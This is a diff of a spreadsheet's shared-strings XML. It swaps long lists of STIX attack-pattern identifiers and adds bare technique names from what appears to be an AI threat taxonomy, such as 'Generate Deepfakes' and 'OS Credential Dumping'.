-  <si>
-    <t>attack-pattern--f1f4f17b-fec1-471d-9d48-52d0009747cd</t>
-  </si>
-  <si>
-    <t>attack-pattern--5b6de841-d80e-4649-8472-73cd184d4fa1</t>
-  </si>
-  <si>
-    <t>attack-pattern--da47ea85-1495-4419-be39-937d4f9fccf3</t>
-  </si>
-  <si>
-    <t>attack-pattern--ca7df05b-6f48-4979-a3ed-5d58340aa2a2</t>
-  </si>
-  <si>
-    <t>attack-pattern--296d4b7d-fe9b-4e9f-ac78-69a001f6b94c</t>
-  </si>
-  <si>
-    <t>attack-pattern--63949113-3bdf-4bf9-8b97-bf88f6ea2b5d</t>
-  </si>
-  <si>
-    <t>attack-pattern--07cdfd57-21de-4ac0-8214-499ea2f213c1</t>
-  </si>
-  <si>
-    <t>attack-pattern--b919c30f-6089-464f-9d87-2e6077c968e8</t>
-  </si>
-  <si>
-    <t>attack-pattern--5b4aaa0e-a59b-4aef-9089-87153268f5a3</t>
-  </si>
-  <si>
-    <t>attack-pattern--c8acdcb8-478b-48df-b35b-9d479b7f8da6</t>
-  </si>
-  <si>
-    <t>attack-pattern--fb43eb43-aafb-485e-ba0b-7308dc640f8e</t>
-  </si>
-  <si>
-    <t>attack-pattern--59772559-b1f5-49a2-b4e4-3e5891dc47d1</t>
-  </si>
-  <si>
-    <t>attack-pattern--fa94cb54-025e-4cbd-8cf1-1edd48a15dcc</t>
-  </si>
-  <si>
-    <t>attack-pattern--a9133f08-daaa-4cab-a3e1-c39746e2c3e0</t>
-  </si>
-  <si>
-    <t>attack-pattern--4a0fd699-cadb-48ed-82dc-5cdf87e272e1</t>
-  </si>
-  <si>
-    <t>attack-pattern--c8c4fd4c-a574-429a-8d1f-3dd1dc014fd0</t>
-  </si>
-  <si>
-    <t>attack-pattern--324a3f50-7a4f-44e2-aa85-8fe279b7b8fd</t>
-  </si>
-  <si>
-    <t>attack-pattern--08b2f97a-9964-499b-8267-0e5d5c88293e</t>
-  </si>
-  <si>
-    <t>attack-pattern--b9cc4754-8b2c-435f-85f7-0ff3287a13d8</t>
-  </si>
-  <si>
-    <t>attack-pattern--8d58618c-2cfa-41d0-95ba-9973a5e10266</t>
-  </si>
-  <si>
-    <t>attack-pattern--148cfb49-1045-4bfe-a76e-8f2e955bf805</t>
-  </si>
-  <si>
-    <t>attack-pattern--af5092c6-0f01-47bc-81a7-b5780b4ee927</t>
-  </si>
-  <si>
-    <t>attack-pattern--2c52ac08-5431-4989-a714-56ad3d5f4c30</t>
-  </si>
-  <si>
-    <t>attack-pattern--5f7a292b-9d03-4d7d-a75d-51c48ec83359</t>
-  </si>
-  <si>
-    <t>attack-pattern--e14109b0-caed-4f22-a7cb-65d98a00d55c</t>
-  </si>
-  <si>
-    <t>attack-pattern--3bae2bf3-b18a-4c90-866e-22a0a5c6364e</t>
-  </si>
-  <si>
-    <t>attack-pattern--5edeb741-19a0-4c43-878b-af097a0d6d2c</t>
-  </si>
-  <si>
-    <t>attack-pattern--93cf6320-66fd-40ff-bb31-022d4678e991</t>
-  </si>
-  <si>
-    <t>attack-pattern--9d51d24e-2325-49b8-99c2-ec3e0759cbdd</t>
-  </si>
-  <si>
-    <t>attack-pattern--e3998e6c-f7c9-4b89-a8d2-afb00c48aea1</t>
-  </si>
-  <si>
-    <t>attack-pattern--041a9792-537b-4a7c-ad8a-e4d8adbb6f3c</t>
-  </si>
-  <si>
-    <t>attack-pattern--b5762e9b-10aa-4388-99dc-dd30222423ad</t>
-  </si>
-  <si>
-    <t>attack-pattern--89977385-7cbf-4c35-aa5f-3556d423b16f</t>
-  </si>
-  <si>
-    <t>attack-pattern--868cf923-8c03-4c1c-8ab9-7f5bbe4be354</t>
-  </si>
-  <si>
-    <t>attack-pattern--0b6afaf3-1c27-4dbc-9ac4-9728b06571ee</t>
-  </si>
-  <si>
-    <t>attack-pattern--29621dd4-0d45-4cef-956e-c94d46934874</t>
-  </si>
-  <si>
-    <t>attack-pattern--fe2aa670-46ff-4c8d-b47e-e924d9a7b44d</t>
-  </si>
-  <si>
-    <t>attack-pattern--a016c780-1be3-4962-9800-3e112816283c</t>
-  </si>
-  <si>
-    <t>attack-pattern--b3376b69-aa19-4644-9de3-e535e7a45214</t>
-  </si>
-  <si>
-    <t>attack-pattern--c7d9ba16-db33-4392-a92b-29775df8127e</t>
-  </si>
-  <si>
-    <t>attack-pattern--e4139803-8d69-4a01-a0d0-bd7fcf8293ec</t>
-  </si>
-  <si>
-    <t>attack-pattern--3349bf19-fc1f-4763-9eb0-4141cbb550cd</t>
-  </si>
-  <si>
-    <t>attack-pattern--2bf39f50-afad-459f-8c0e-d6773a1bda2b</t>
-  </si>
-  <si>
-    <t>attack-pattern--78dc8397-b8d3-4508-b7d7-de5eed2e0b34</t>
-  </si>
-  <si>
-    <t>attack-pattern--d276f052-7ca6-40c2-9b44-1bd8de0d9216</t>
-  </si>
-  <si>
-    <t>attack-pattern--b7f68362-d45a-4d2a-8641-c0cecc09b274</t>
-  </si>
-  <si>
-    <t>attack-pattern--6a7c645b-4b72-486d-a7ac-c5f92d994224</t>
-  </si>
-  <si>
-    <t>attack-pattern--633e83b9-7d27-4b3a-9f59-50cc8e60fa4e</t>
-  </si>
-  <si>
-    <t>attack-pattern--211afbd5-cb54-4712-9736-352b4d2af207</t>
-  </si>
-  <si>
-    <t>attack-pattern--fac3953d-1a76-41c2-b8fb-5335360f3a70</t>
-  </si>
-  <si>
-    <t>attack-pattern--92147a80-f17e-450e-907f-8ed496079a86</t>
-  </si>
-  <si>
-    <t>attack-pattern--b41c165d-9b71-4e7f-936e-13f6495d6c8f</t>
-  </si>
-  <si>
-    <t>attack-pattern--38a287f8-0695-4f34-af91-84a997f1384a</t>
-  </si>
-  <si>
-    <t>attack-pattern--75170956-8c65-4a9d-84cd-a390972a4ad8</t>
-  </si>
-  <si>
-    <t>attack-pattern--97c9fae3-b20b-4f07-8f54-28fde4aed8d9</t>
-  </si>
-  <si>
-    <t>attack-pattern--eea60636-03ca-4806-b0fc-efd93e943629</t>
-  </si>
-  <si>
-    <t>attack-pattern--b3d87887-9db8-4dc4-a03e-f89493ed17ad</t>
-  </si>
-  <si>
-    <t>attack-pattern--724b0528-6716-415e-8b32-023982f41b65</t>
-  </si>
-  <si>
-    <t>attack-pattern--047a52ef-ed5f-4807-95e8-90c48db70911</t>
-  </si>
-  <si>
-    <t>attack-pattern--2ab8f666-b644-4a59-8422-ee17ffe2d966</t>
-  </si>
-  <si>
-    <t>attack-pattern--2d88f847-1507-475c-ad16-448673303a8d</t>
-  </si>
-  <si>
-    <t>attack-pattern--afb54222-e4ab-4f9a-af08-8410816ed85e</t>
-  </si>
-  <si>
-    <t>attack-pattern--2ab2242e-f52d-42a1-9b5c-487d56e6130a</t>
-  </si>
-  <si>
-    <t>attack-pattern--e055148e-b7d9-44eb-97b8-8e1147fa945d</t>
-  </si>
-  <si>
-    <t>attack-pattern--82440a8e-09d7-445d-a120-8186984dc25f</t>
-  </si>
-  <si>
-    <t>attack-pattern--60c58536-0a04-4468-9e15-703b2d65e516</t>
-  </si>
-  <si>
-    <t>attack-pattern--682b745d-b6a3-476c-a4ff-6165492e20da</t>
-  </si>
-  <si>
-    <t>attack-pattern--68948a16-1aa4-4b26-a479-5fc24403e9e1</t>
-  </si>
-  <si>
-    <t>attack-pattern--10f4a431-2663-498f-bef9-2de43f4d733d</t>
-  </si>
-  <si>
-    <t>attack-pattern--650ab043-58e9-4765-9d89-8410f7706b37</t>
-  </si>
-  <si>
-    <t>attack-pattern--0c92231b-f3fe-4da0-ba24-f3d7243f9be7</t>
-  </si>
-  <si>
-    <t>attack-pattern--9bfb5ad8-b0d2-4a4e-850b-1533b9aaded4</t>
-  </si>
-  <si>
-    <t>attack-pattern--1eeb1415-94d5-4b4f-80ac-5cb949a25412</t>
-  </si>
-  <si>
-    <t>attack-pattern--053e0bc4-eb19-4a9c-945f-5914557ef1ee</t>
-  </si>
-  <si>
-    <t>attack-pattern--e3ce6dc6-7e12-449d-9c73-7cac156023e7</t>
-  </si>
-  <si>
-    <t>attack-pattern--b17d49ce-5d00-4dd1-adc3-fce5a3c8888d</t>
-  </si>
-  <si>
-    <t>attack-pattern--56bc1ef0-2adb-4d1e-b9fa-2555c67eba28</t>
-  </si>
-  <si>
-    <t>attack-pattern--29704c6c-04ee-4d3f-9fed-026e011b808e</t>
-  </si>
-  <si>
-    <t>attack-pattern--13c08a15-bb61-4ac5-88f9-bf83e2c6e8f1</t>
-  </si>
-  <si>
-    <t>attack-pattern--6cb15293-c301-41be-9514-59c2d145daaa</t>
-  </si>
-  <si>
-    <t>attack-pattern--75f4b6e6-2c1a-489a-9819-a46b08dece0b</t>
-  </si>
-  <si>
-    <t>attack-pattern--a733a4be-72af-44fd-8863-2a45c2de187b</t>
-  </si>
-  <si>
-    <t>attack-pattern--f4eaeff7-1307-4da2-bdf7-5c94703de244</t>
-  </si>
-  <si>
-    <t>attack-pattern--77727d6d-ec87-4c1c-a8be-9252e061fcc3</t>
-  </si>
-  <si>
-    <t>attack-pattern--6b5b7d7d-fdf9-4254-a2ae-c3475619fd0e</t>
-  </si>
-  <si>
-    <t>attack-pattern--8f25f9f4-2c76-472c-a353-777b8ccaa28a</t>
-  </si>
-  <si>
-    <t>attack-pattern--a26b7874-88c5-46c0-b5ac-d93ac3739fe6</t>
-  </si>
-  <si>
-    <t>attack-pattern--d024ba77-7c46-44fa-81dc-35376664d66f</t>
-  </si>
-  <si>
-    <t>attack-pattern--b6798c32-1cb0-4fff-9ca7-5b340676d3bd</t>
-  </si>
-  <si>
-    <t>attack-pattern--02573874-564d-405f-b9ea-d5299cd6a770</t>
-  </si>
-  <si>
-    <t>attack-pattern--82e496fa-4573-4974-9dcd-4bf1d4f2766a</t>
-  </si>
-  <si>
-    <t>attack-pattern--a1da447c-e908-4b99-b8be-45d0039e4eb5</t>
-  </si>
-  <si>
-    <t>attack-pattern--7187fe3d-e183-4dd9-a67c-e2be1cd7de1a</t>
-  </si>
-  <si>
-    <t>attack-pattern--023c1e52-ad3a-4991-9f0b-eef64fbfc503</t>
-  </si>
-  <si>
-    <t>attack-pattern--b64006d0-780e-45a1-ac8c-b5a80860267a</t>
-  </si>
-  <si>
-    <t>attack-pattern--5bf3c7e5-0566-4e9b-9dde-2df306555440</t>
-  </si>
-  <si>
-    <t>attack-pattern--5375bdef-23a1-4a72-bcf3-4e1b9b5bb323</t>
-  </si>
-  <si>
-    <t>attack-pattern--261276a5-b434-43ee-9d63-e1c6967d0769</t>
-  </si>
-  <si>
-    <t>attack-pattern--13895978-e8ed-47d2-af57-4e8522047dee</t>
-  </si>
-  <si>
-    <t>attack-pattern--865eec6c-0065-4df4-bfa7-3b6d0e5f3545</t>
-  </si>
-  <si>
-    <t>attack-pattern--ab26383f-c974-4ea2-9e1b-8b9236760489</t>
-  </si>
-  <si>
-    <t>attack-pattern--aa3a3203-adf2-4a34-b67a-08d31e3131c4</t>
-  </si>
-  <si>
-    <t>attack-pattern--8ed6d88d-79c6-48f5-a863-3d960d9a192c</t>
-  </si>
-  <si>
-    <t>attack-pattern--fed00fd1-986f-4962-a4d2-3ea7168ec7e8</t>
-  </si>
-  <si>
-    <t>attack-pattern--862d82d3-ad1a-4fcf-ad92-8b84b7204b5b</t>
-  </si>
-  <si>
-    <t>attack-pattern--2b52830c-388d-42bd-a945-bd9bdc78bf5d</t>
-  </si>
-  <si>
-    <t>attack-pattern--a7333d62-87fe-42a2-b508-28efb82fd79d</t>
-  </si>
-  <si>
-    <t>attack-pattern--d262dc2e-8e6b-46dd-b0f0-c79d64577fe8</t>
-  </si>
-  <si>
-    <t>attack-pattern--819e6107-3d92-43be-8e28-8e38c08ce9f9</t>
-  </si>
-  <si>
-    <t>attack-pattern--25865b84-354b-4f43-a41f-3fa5cc159253</t>
-  </si>
-  <si>
-    <t>attack-pattern--dcc027c8-8a51-4d03-8d4c-41d5ae6cb83b</t>
-  </si>
-  <si>
-    <t>attack-pattern--6ace3735-3c47-4a37-833f-9d8fc26ce0c4</t>
-  </si>
-  <si>
-    <t>attack-pattern--282c9e6f-42f0-43f7-950e-18fa7f313ed0</t>
-  </si>
-  <si>
-    <t>attack-pattern--d0d06b7c-f920-4da1-8a0e-d4289e312c54</t>
-  </si>
-  <si>
-    <t>attack-pattern--de4823e0-f55c-49c6-90fc-e91bbc0e34d2</t>
-  </si>
-  <si>
-    <t>attack-pattern--3e1f7c25-d154-4f03-a374-15ddd7ce6eb4</t>
-  </si>
-  <si>
-    <t>attack-pattern--43236365-129e-4376-aa33-aaca5282e9b3</t>
-  </si>
-  <si>
-    <t>attack-pattern--7fb874e9-a690-4696-ad74-69234fa9ace5</t>
-  </si>
-  <si>
-    <t>attack-pattern--f39f54cc-6d52-4fc8-9546-5f426890a128</t>
-  </si>
-  <si>
-    <t>attack-pattern--476c43ad-1a16-4a38-9109-22dad22cc998</t>
-  </si>
-  <si>
-    <t>attack-pattern--2cfaa250-11b0-4451-bf5d-f2628036c79a</t>
-  </si>
-  <si>
-    <t>attack-pattern--27317dc5-37f1-458c-8c7c-f574ea8ece83</t>
-  </si>
-  <si>
-    <t>attack-pattern--3dec1e87-8cd0-4a71-977b-cb182ca4434f</t>
-  </si>
-  <si>
-    <t>attack-pattern--254fbfe8-c7d6-41e3-a81b-d49da083f1aa</t>
-  </si>
-  <si>
-    <t>attack-pattern--3b4da875-1cff-4405-85aa-f8488a5a5b79</t>
-  </si>
-  <si>
-    <t>attack-pattern--2a01b6d6-2efe-41f8-a8fe-15982adf21a4</t>
-  </si>
-  <si>
-    <t>attack-pattern--7c2776a4-292a-43a3-9f1f-55b743c3cdb3</t>
+    <t>attack-pattern--12edcfea-e809-45ab-ba68-a678b828dc0e</t>
+  </si>
+  <si>
+    <t>attack-pattern--4a4c006f-9edb-4161-af0c-31ae36cfeb6e</t>
+  </si>
+  <si>
+    <t>attack-pattern--cb2ad666-315c-49e8-87f9-978ffcb1c696</t>
+  </si>
+  <si>
+    <t>attack-pattern--2a2d2e69-55da-4212-809a-eb6ecde65f70</t>
+  </si>
+  <si>
+    <t>attack-pattern--408d1e30-4fd6-41f1-bc48-cf575e74b18a</t>
+  </si>
+  <si>
+    <t>attack-pattern--30f1f6a3-f227-4293-a102-c4be62566f42</t>
+  </si>
+  <si>
+    <t>attack-pattern--8755a1fb-e2df-4538-bcf3-9d37d31cf0e5</t>
+  </si>
+  <si>
+    <t>attack-pattern--eaec44e1-048d-487a-8774-da706f6744d6</t>
+  </si>
+  <si>
+    <t>attack-pattern--0a4c52dc-1241-4d85-88af-e77919000c98</t>
+  </si>
+  <si>
+    <t>attack-pattern--78121d5a-c458-40dc-a83a-3e5771d5f966</t>
+  </si>
+  <si>
+    <t>attack-pattern--ca18d6e9-9302-4411-afdc-6bbdd227cf34</t>
+  </si>
+  <si>
+    <t>attack-pattern--74b811fa-679a-4af8-90c0-0d8e29d59e16</t>
+  </si>
+  <si>
+    <t>attack-pattern--9c0e3816-6af3-4831-a6cb-063ecd8912bc</t>
+  </si>
+  <si>
+    <t>attack-pattern--0f69567a-b943-4d73-b8a8-eb353966a75c</t>
+  </si>
+  <si>
+    <t>attack-pattern--4df36b1a-0187-4166-9409-ff7c786e5aa8</t>
+  </si>
+  <si>
+    <t>attack-pattern--c23ca372-b331-4f75-9837-5009f44cd238</t>
+  </si>
+  <si>
+    <t>attack-pattern--3c8879fd-fbe4-4a4e-b696-9941719a0ac1</t>
+  </si>
+  <si>
+    <t>attack-pattern--f8f6de56-8b84-4883-99d2-a6ab686ff802</t>
+  </si>
+  <si>
+    <t>attack-pattern--7efea7f3-c603-4d10-b1f1-6376873f9c71</t>
+  </si>
+  <si>
+    <t>attack-pattern--60ce2322-135c-4492-9e39-5061eae8f6a7</t>
+  </si>
+  <si>
+    <t>attack-pattern--afb92d07-5db6-4a84-b473-cd12bb99f229</t>
+  </si>
+  <si>
+    <t>attack-pattern--9d44d423-99ca-49ad-b5d4-7b3fa368b7ad</t>
+  </si>
+  <si>
+    <t>attack-pattern--53ea9b24-4814-44c0-ac51-993e102f06ed</t>
+  </si>
+  <si>
+    <t>attack-pattern--ea30ad28-4b01-4236-a447-28116c9a4805</t>
+  </si>
+  <si>
+    <t>attack-pattern--a40bd74f-f2de-4f60-bd0c-f2a1f0a56718</t>
+  </si>
+  <si>
+    <t>attack-pattern--6171704b-8ace-4d2e-8727-a4f0c5ca7b4a</t>
+  </si>
+  <si>
+    <t>attack-pattern--2bc121ad-7ab0-4630-a5e9-d5a7922fa8dd</t>
+  </si>
+  <si>
+    <t>attack-pattern--da3da4d4-a261-4dd0-9d4c-36bd43e886b4</t>
+  </si>
+  <si>
+    <t>attack-pattern--2dd0f878-83b0-4c24-8e7f-a598db0c379d</t>
+  </si>
+  <si>
+    <t>attack-pattern--948dd102-ecc7-4cf3-8331-e1e5abd54a66</t>
+  </si>
+  <si>
+    <t>attack-pattern--835d9bc1-2389-44e0-b4dd-87d11692833a</t>
+  </si>
+  <si>
+    <t>attack-pattern--79594ffe-7578-4fb5-864c-cb0bb3e13bcc</t>
+  </si>
+  <si>
+    <t>attack-pattern--9ab48298-95df-4d38-bb17-5bc134f83210</t>
+  </si>
+  <si>
+    <t>attack-pattern--7847b0ce-4e31-450c-b2f5-fe5d34d6ede4</t>
+  </si>
+  <si>
+    <t>attack-pattern--0b61d089-92cc-421d-a5e9-8ee7f290c0a6</t>
+  </si>
+  <si>
+    <t>attack-pattern--ac97befe-574d-4624-9615-6ec5f3c15d7e</t>
+  </si>
+  <si>
+    <t>attack-pattern--1ad2142f-bd6b-4c39-904d-4b6e00c48a44</t>
+  </si>
+  <si>
+    <t>attack-pattern--568bdae0-9c1e-4f17-9ad8-b1284fc343c2</t>
+  </si>
+  <si>
+    <t>attack-pattern--b2708d3b-cfc7-4d43-877a-c1c89246c379</t>
+  </si>
+  <si>
+    <t>attack-pattern--4187ee08-0ae4-4b24-b648-c7e85c8805e0</t>
+  </si>
+  <si>
+    <t>attack-pattern--753e6d26-e7b3-441b-909a-455119166eb1</t>
+  </si>
+  <si>
+    <t>attack-pattern--242cd62a-715a-4482-b2fb-b628dd6c2bd2</t>
+  </si>
+  <si>
+    <t>attack-pattern--123e4b64-f2ef-4eab-a979-ceba2901ac85</t>
+  </si>
+  <si>
+    <t>attack-pattern--0c6a1b8e-9650-41a2-a58a-7628bf998fc6</t>
+  </si>
+  <si>
+    <t>attack-pattern--3518855d-8b96-4805-ba45-713e2cefbf82</t>
+  </si>
+  <si>
+    <t>attack-pattern--d62c9a46-a6a3-42f9-a200-28a2b6626b34</t>
+  </si>
+  <si>
+    <t>attack-pattern--68ac114f-e054-474a-994a-30396929438e</t>
+  </si>
+  <si>
+    <t>attack-pattern--ef912563-cd9f-4416-85aa-0af1e77defc8</t>
+  </si>
+  <si>
+    <t>attack-pattern--aa93940d-aa5c-4b25-80a0-4c2d6dac873a</t>
+  </si>
+  <si>
+    <t>attack-pattern--2b11c16e-6de1-4308-941d-503450611f29</t>
+  </si>
+  <si>
+    <t>attack-pattern--0c9f47cf-1b80-4e03-88b9-c1f496c1703d</t>
+  </si>
+  <si>
+    <t>attack-pattern--e3c492a9-d5ee-49e7-be6b-8475b0a6bfc2</t>
+  </si>
+  <si>
+    <t>attack-pattern--65a96a5b-97fc-4c2a-b28d-ec431a7d6b16</t>
+  </si>
+  <si>
+    <t>attack-pattern--ba0780ed-8721-4ed2-af10-7957816a2706</t>
+  </si>
+  <si>
+    <t>attack-pattern--723710a2-5947-4211-a050-f79b4dc76144</t>
+  </si>
+  <si>
+    <t>attack-pattern--c3f4ed27-3927-4af1-a9d0-a9f5a62e1b28</t>
+  </si>
+  <si>
+    <t>attack-pattern--6fbe5472-f514-4ea3-aaa3-bfeef28d4d3f</t>
+  </si>
+  <si>
+    <t>attack-pattern--d58b4f91-5abd-47fa-986e-28e0c4b840a8</t>
+  </si>
+  <si>
+    <t>attack-pattern--b882dc78-920e-4241-bf44-fdc95d1ab009</t>
+  </si>
+  <si>
+    <t>attack-pattern--14644c46-5768-4f18-a42d-2975aa3439bd</t>
+  </si>
+  <si>
+    <t>attack-pattern--cddeee77-314c-482e-a23e-2328875d8006</t>
+  </si>
+  <si>
+    <t>attack-pattern--c97f5a0b-afd7-48b8-a59d-f20879395fd3</t>
+  </si>
+  <si>
+    <t>attack-pattern--94e4d142-dd64-464a-9675-e8a14aca8261</t>
+  </si>
+  <si>
+    <t>attack-pattern--ff58975a-c95b-4a27-b476-5eb4e3eae306</t>
+  </si>
+  <si>
+    <t>attack-pattern--6ff43c1d-364e-4474-b24a-72173b77b973</t>
+  </si>
+  <si>
+    <t>attack-pattern--061a4089-aa9c-4ad7-a3a2-1ff01434efae</t>
+  </si>
+  <si>
+    <t>attack-pattern--56185ba0-9145-4f93-829c-3911e6624ed5</t>
+  </si>
+  <si>
+    <t>attack-pattern--8a477141-c62d-4b00-ae3d-25a1d4bb3ae4</t>
+  </si>
+  <si>
+    <t>attack-pattern--0b027ade-8ede-4ff1-a239-f3437ef0f475</t>
+  </si>
+  <si>
+    <t>attack-pattern--9a402de5-aa40-41f2-8e36-38e41ae962f7</t>
+  </si>
+  <si>
+    <t>attack-pattern--3ec5213b-94f3-4a03-a127-c7988dbf24d9</t>
+  </si>
+  <si>
+    <t>attack-pattern--874de68e-9842-48e2-b04e-a08ffaeb19e5</t>
+  </si>
+  <si>
+    <t>attack-pattern--d4a80308-c6c1-487b-92f2-ca23374b0fad</t>
+  </si>
+  <si>
+    <t>attack-pattern--8a62c6fa-c1d7-42b7-841d-fc6e0153f176</t>
+  </si>
+  <si>
+    <t>attack-pattern--e19b38ca-6197-43d5-999f-6dd8bf79bf43</t>
+  </si>
+  <si>
+    <t>attack-pattern--15c00b06-ace3-46c1-9f37-5c882becfba3</t>
+  </si>
+  <si>
+    <t>attack-pattern--f378935a-cb5e-446f-97bf-e72fb430f20b</t>
+  </si>
+  <si>
+    <t>attack-pattern--f34e16c9-f3a3-4895-91e1-c1349ac2424f</t>
+  </si>
+  <si>
+    <t>attack-pattern--f9e6bd5d-62e4-4a85-aaf0-529d84b8a786</t>
+  </si>
+  <si>
+    <t>attack-pattern--9f78285d-9218-4d6f-8d64-7de7e1e37261</t>
+  </si>
+  <si>
+    <t>attack-pattern--054692af-eb4d-4714-86f1-c65caab22dff</t>
+  </si>
+  <si>
+    <t>attack-pattern--34f70869-9d80-4452-97e0-16399eb91e2f</t>
+  </si>
+  <si>
+    <t>attack-pattern--57ded1f2-2297-49c9-8e47-7db29fe7e96e</t>
+  </si>
+  <si>
+    <t>attack-pattern--b57c67d7-1442-485e-a60c-6581b7911930</t>
+  </si>
+  <si>
+    <t>attack-pattern--adc5e672-a927-40cc-b8c8-d955eadca06c</t>
+  </si>
+  <si>
+    <t>attack-pattern--c32157ce-b6f1-458c-8d0d-a37a228f4ff3</t>
+  </si>
+  <si>
+    <t>attack-pattern--d5b75e5e-5296-41d7-bc72-2e5aa7c9918d</t>
+  </si>
+  <si>
+    <t>attack-pattern--b252a691-ee08-4ae8-981b-b3f004a32ee9</t>
+  </si>
+  <si>
+    <t>attack-pattern--68bda813-33bf-4843-9964-5c446c22c01e</t>
+  </si>
+  <si>
+    <t>attack-pattern--c9746330-554c-4359-86a1-f3553102e56a</t>
+  </si>
+  <si>
+    <t>attack-pattern--5fc7dfad-48b9-49ce-bd65-0964f80126bf</t>
+  </si>
+  <si>
+    <t>attack-pattern--4698eee5-b315-4030-be87-55ccb3e4de06</t>
+  </si>
+  <si>
+    <t>attack-pattern--f9efc079-fd9e-4bdb-854f-0ea194521a68</t>
+  </si>
+  <si>
+    <t>attack-pattern--dfee8878-6148-49f2-84ce-80464f0e0682</t>
+  </si>
+  <si>
+    <t>attack-pattern--05249f4a-67bd-4abe-8b62-4f8e487ad6b7</t>
+  </si>
+  <si>
+    <t>attack-pattern--70d17d9f-0b95-4cc5-8c09-e000bd4486b0</t>
+  </si>
+  <si>
+    <t>attack-pattern--18b30bd8-ffa5-41ac-aa92-eead8ee22ae5</t>
+  </si>
+  <si>
+    <t>attack-pattern--a5363aa6-628f-4326-a180-6390bc609aec</t>
+  </si>
+  <si>
+    <t>attack-pattern--c357897c-662c-4a41-883d-98bfb369ab30</t>
+  </si>
+  <si>
+    <t>attack-pattern--f6f8e972-cde7-4094-b68a-75ce413415f3</t>
+  </si>
+  <si>
+    <t>attack-pattern--5e497eda-25f7-4f68-8bb4-89cb98cb5295</t>
+  </si>
+  <si>
+    <t>attack-pattern--4e0dd341-d2b5-4740-bc74-3c6b69e75b6c</t>
+  </si>
+  <si>
+    <t>attack-pattern--9bf37423-9b1a-4cdf-8588-cc146c94c21f</t>
+  </si>
+  <si>
+    <t>attack-pattern--b0dbc5d2-4207-445a-9b08-6df360948fb1</t>
+  </si>
+  <si>
+    <t>attack-pattern--6b9f7277-4207-4fa7-a8af-946715cade74</t>
+  </si>
+  <si>
+    <t>attack-pattern--52283b39-3b57-4a79-afee-761cee49a4e8</t>
+  </si>
+  <si>
+    <t>attack-pattern--9b153778-a791-4e7d-b498-fd962a77624b</t>
+  </si>
+  <si>
+    <t>attack-pattern--4d2d534b-473d-4983-a049-52052d1f5456</t>
+  </si>
+  <si>
+    <t>attack-pattern--18768c89-a7c5-410a-95e8-dec77edf9594</t>
+  </si>
+  <si>
+    <t>attack-pattern--ee282f59-bf8d-474b-aa9e-e7ac1e1c5a07</t>
+  </si>
+  <si>
+    <t>attack-pattern--4f89acd9-606f-48a6-b041-24068d04b818</t>
+  </si>
+  <si>
+    <t>attack-pattern--1d35b531-4802-4a44-8897-47fbff98f4dc</t>
+  </si>
+  <si>
+    <t>attack-pattern--ea6875ba-3f47-4636-b80f-3964e3faf6d9</t>
+  </si>
+  <si>
+    <t>attack-pattern--87b94e0e-5d5d-438e-9603-083b2196e765</t>
+  </si>
+  <si>
+    <t>attack-pattern--03f3b5b6-ec07-4b6c-bbe3-ba0318933a36</t>
+  </si>
+  <si>
+    <t>attack-pattern--fffa50b1-9bdb-4188-8734-10567904c15f</t>
+  </si>
+  <si>
+    <t>attack-pattern--e83e410b-cbeb-4e5a-a266-2cf46d850b1a</t>
+  </si>
+  <si>
+    <t>attack-pattern--56913fa2-ea59-487a-ac16-0d432eb8e808</t>
+  </si>
+  <si>
+    <t>attack-pattern--c66281c8-1b88-41a5-95db-50e2fbf84fa1</t>
+  </si>
+  <si>
+    <t>attack-pattern--bb56158c-34a8-4eb6-947e-d6831babd031</t>
+  </si>
+  <si>
+    <t>attack-pattern--2ae49cee-9d83-4ef1-a3d3-107ee6b92241</t>
+  </si>
+  <si>
+    <t>attack-pattern--f5a4aa73-a4d1-4e2b-9af2-c7448df56b02</t>
+  </si>
+  <si>
+    <t>attack-pattern--3cb8a337-5f3d-4b1f-a6ca-a7ee3378d5e0</t>
+  </si>
+  <si>
+    <t>attack-pattern--8fa43514-e02a-4034-80f8-ab5052a5d812</t>
+  </si>
+  <si>
+    <t>attack-pattern--8831f04e-93f9-4836-b138-586e566ddf20</t>
+  </si>
+  <si>
+    <t>attack-pattern--aad94e82-da34-4951-ae68-ba33107dbca0</t>
+  </si>
+  <si>
+    <t>attack-pattern--67558c56-9a0c-4b36-803b-2b7e0b4f9a5c</t>
+  </si>
+  <si>
+    <t>attack-pattern--1914f33c-3e1d-4a33-985d-1490cd6fb0a4</t>
+  </si>
+  <si>
+    <t>attack-pattern--8efa02a7-b199-447e-b66a-094d1db6031c</t>
+  </si>
+  <si>
+    <t>attack-pattern--f3ca37b5-5658-4026-b992-e2bf9aa6edcb</t>
+  </si>
+  <si>
+    <t>attack-pattern--df6768d8-1950-434b-9957-029b0d6bf560</t>
+  </si>
+  <si>
+    <t>attack-pattern--eb12109e-5540-4de8-a3f2-0a3b85ebaf98</t>
+  </si>
+  <si>
+    <t>attack-pattern--3c5ee2f3-c1c8-4638-9d6f-b5d2c7ee6467</t>
+  </si>
+  <si>
+    <t>attack-pattern--b75ad076-327e-499a-8e10-981f437e9092</t>
+  </si>
+  <si>
+    <t>attack-pattern--ef77e901-4146-426c-9927-fb7a445716b5</t>
+  </si>
+  <si>
+    <t>attack-pattern--392a08c5-1a22-45b3-b85d-28011da21a0c</t>
+  </si>
+  <si>
+    <t>attack-pattern--f6171db5-f5e6-48a3-8f39-4bc7ba6413ae</t>
+  </si>
+  <si>
+    <t>attack-pattern--137e8bec-8054-4be1-b5d1-3f4e8f67b9d5</t>
+  </si>
+  <si>
+    <t>attack-pattern--48ad4cfc-a8b6-4837-aa34-30a0f4026f2c</t>
+  </si>
+  <si>
+    <t>attack-pattern--f57d4d58-f1ca-4924-becc-730e186ca0fd</t>
   </si>
   <si>
     <t>AI Agent Context Poisoning</t>
@@ -874,6 +934,9 @@
     <t>Adversarial AI Attacks</t>
   </si>
   <si>
+    <t>Application Access Token</t>
+  </si>
+  <si>
     <t>Black-Box Optimization</t>
   </si>
   <si>
@@ -925,6 +988,9 @@
     <t>Datasets</t>
   </si>
   <si>
+    <t>Delay Execution of LLM Instructions</t>
+  </si>
+  <si>
     <t>Denial of AI Service</t>
   </si>
   <si>
@@ -1012,6 +1078,12 @@
     <t>Gather RAG-Indexed Targets</t>
   </si>
   <si>
+    <t>Gather Victim Identity Information</t>
+  </si>
+  <si>
+    <t>Generate Deepfakes</t>
+  </si>
+  <si>
     <t>Generative AI</t>
   </si>
   <si>
@@ -1066,6 +1138,9 @@
     <t>Manipulate AI Model</t>
   </si>
   <si>
+    <t>Manipulate User LLM Chat History</t>
+  </si>
+  <si>
     <t>Manual Modification</t>
   </si>
   <si>
@@ -1087,6 +1162,9 @@
     <t>Modify AI Model Architecture</t>
   </si>
   <si>
+    <t>OS Credential Dumping</t>
+  </si>
